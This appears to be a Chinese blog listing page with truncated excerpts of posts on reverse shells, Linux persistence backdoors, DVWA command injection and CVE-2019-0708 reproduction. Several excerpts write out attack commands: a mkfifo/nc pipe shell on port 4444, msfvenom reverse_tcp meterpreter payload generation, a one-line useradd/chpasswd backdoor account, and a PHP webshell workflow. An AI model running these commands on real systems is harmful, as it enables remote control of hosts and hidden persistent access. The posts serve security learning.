反弹shell备忘录 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网v ...
分类:
系统相关 时间:
2020-02-13 17:29:58
阅读次数:
96
开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 ...
分类:
其他好文 时间:
2020-02-06 16:14:05
阅读次数:
88
powercat 也是一套基于 DNS 通信协议的工具。Powercat的dns的通信是基于dnscat设计的(其服务端就是dnscat)。在使用dnscat时需要进行下载和编译。 dnscat服务端安装: #git clone https://github.com/iagox86/dnscat2. ...
分类:
其他好文 时间:
2020-02-02 11:42:35
阅读次数:
91
在CVE-2019-0708公布后几天就已经尝试过复现该漏洞,但借助当时exp并没能成功复现反弹shell的过程遂放弃,故借助这次漏洞复现报告再来尝试复现该漏洞,因为还在大三学习中,有很多知识还没有掌握,出现的错误希望得到指正,也想借此给19年的学习画上句号,希望这次可以成功吧。 漏洞背景 CVE- ...
分类:
其他好文 时间:
2020-01-28 10:56:14
阅读次数:
75
[TOC] ssh软连接 添加用户 修改/etc/sudoers文件 suid后门 crontab反弹shell后门 ssh免密登录 ssh wrapper后门 inetd strace后门 协议后门 icmp 使用情况:主机从内到外的服务也被仅用了很多,但是icmp没有被禁用(一般很少禁用ping ...
分类:
系统相关 时间:
2019-12-26 00:09:17
阅读次数:
163
nc反弹 当nc没有 e选项的时候 nc 存在 e选项的时候 bash socat 脚本语言: telnet: awk: crontab: 针对交互式不友好 一句话增加用户 useradd newuser;echo "newuser:password"|chpasswd 例:useradd gues ...
分类:
系统相关 时间:
2019-11-29 23:40:31
阅读次数:
102
背景 该漏洞最初由Pieter Ceelen发现。如果安装时启用 ,可实现悄无声息执行命令。 查看打开文件的默认程序,可以看到 文件默认用Excel打开 POC,打开计算器测试 反弹shell测试 总结 默认配置的Excel一般会有宏的提示,对于安全意识不高的群体仍然存在一定的风险。 参考 http ...
分类:
系统相关 时间:
2019-11-18 18:42:22
阅读次数:
112
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/me ...
分类:
其他好文 时间:
2019-11-16 14:14:37
阅读次数:
138
0x00 反弹shell概述 反弹shell:即reverse shell,在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,通过反弹的shell去远程控制服务器。 0x01 反弹shell原因 通常由于防火墙、权限不足、端口占用等情况下,无法直接连接目标主机,此时 ...
分类:
系统相关 时间:
2019-11-16 12:18:17
阅读次数:
134
一、PHP后门 在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下: 1. 使用msfvenom 创建一个webshell.php 2. 上传到服务器 3.开始监听 4.访问webshell.php的页面 5. 获得反弹Shell pa ...
分类:
Web程序 时间:
2019-10-10 15:36:22
阅读次数:
130
